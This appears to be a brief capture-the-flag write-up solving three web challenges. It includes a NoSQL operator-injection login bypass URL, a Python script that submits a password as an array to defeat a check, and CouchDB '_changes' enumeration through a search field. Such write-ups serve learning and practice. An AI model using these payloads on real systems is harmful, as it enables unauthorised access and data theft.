Web200

this was an easy NoSQL injection:

http://54.197.244.234/web200/?userid[$ne]=1&password[$ne]=1

Web300

the task gave us an APK. After decompiled it the java code basically checks for an hard-coded password that was ‘passwd’. Then the application do a POST request to /update.php with parameters pwd, imei and div that return an error message. To get the flag just submit pwd as an array:

import requests
headers = {
'User-Agent': 'Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Mobile Safari/535.19',
}
payload = {'pwd[]': 'paswd', 'imei': '123','div':'321'}
r = requests.post("http://challenges.defconkerala.com/web/300/update.php", data=payload,headers=headers)
print r.text

Web400

couchdb was used for this challenge. We first take a look at the recent modifications to the db:

http://54.201.96.212:888/web400/web_search.php?search=_changes&submit=Submit

we saw a table there named ‘flag_for_l33ts’. Just put it in search field and get the flag:

http://54.201.96.212:888/web400/web_search.php?search=flag_for_l33ts&submit=Submit

Razor4x